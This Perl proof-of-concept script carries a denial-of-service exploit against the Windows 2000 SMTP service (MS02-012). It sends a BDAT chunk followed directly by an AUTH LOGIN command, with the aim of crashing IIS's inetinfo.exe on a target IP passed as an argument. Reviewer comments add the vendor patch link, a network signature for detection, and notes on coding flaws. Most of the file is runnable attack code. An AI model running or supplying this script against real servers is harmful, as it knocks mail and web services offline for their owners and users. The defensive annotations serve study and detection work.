#!/usr/bin/perl -w
##################
#
#
#   URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
#        The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
#        Denial of Service attack through the BDAT command. If exploited, this
#        vulnerability will cause any and all services running under IIS (the
#        inetinfo.exe process) to become unavailable.
#
#
# Solution: 
#	
#        http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#

use IO::Socket;
    
# Proof-of-concept for the BDAT denial of service described in the header
# comment. The script opens one SMTP session, starts a mail transaction,
# sends a BDAT chunk followed directly by an AUTH LOGIN command, and closes.
# It never checks whether the service actually stopped responding.
#
# Defender notes:
#   * The fix is the vendor patch referenced under "Solution" in the header.
#   * On the wire the session shows an AUTH LOGIN command arriving inside an
#     open mail transaction, immediately after a 4-byte BDAT chunk. SMTP
#     logs or network sensors can match on that sequence.

# Target host comes from the first command-line argument; loopback is the
# default. NOTE(review): $target (and $resp below) are not declared with
# `my` and the file does not `use strict`, so both are package globals.
$target = shift() || "127.0.0.1";
my $port = 25;                      # standard SMTP port
my $rcpt = "Administrator";         # envelope recipient (local part only)
my $from = "crash\@burn.com";       # envelope sender

# Plain TCP connection to the SMTP service; dies if the connect fails.
# NOTE(review): IO::Socket::INET reports constructor failures in $@, so $!
# may not carry a useful message here.
my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

# Read the greeting line. Any line beginning with '2' is accepted as a
# success reply; anything else (including an undefined read, which also
# triggers an uninitialized-value warning under -w) aborts with exit code 1.
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

# Standard SMTP envelope. Each reply is read as a single line into $resp
# only to keep the dialogue in step; it is never inspected, so the script
# carries on even if the server rejects a command.
print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $from\r\n";
$resp = <$sock>;

print $sock "RCPT TO: $rcpt\r\n";
$resp = <$sock>;

# BDAT announces a 4-byte chunk. The next write supplies exactly those four
# bytes ("b00m") with "AUTH LOGIN\r\n" appended on the same line, so the
# text after the chunk is what the server reads as its next command.
# Presumably this is the sequence that triggers the fault described in the
# header; the script itself does not confirm the outcome.
print $sock "BDAT 4\r\n";
print $sock "b00mAUTH LOGIN\r\n";
$resp = <$sock>;

# Send a run of empty lines without reading any further replies, then drop
# the connection.
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);

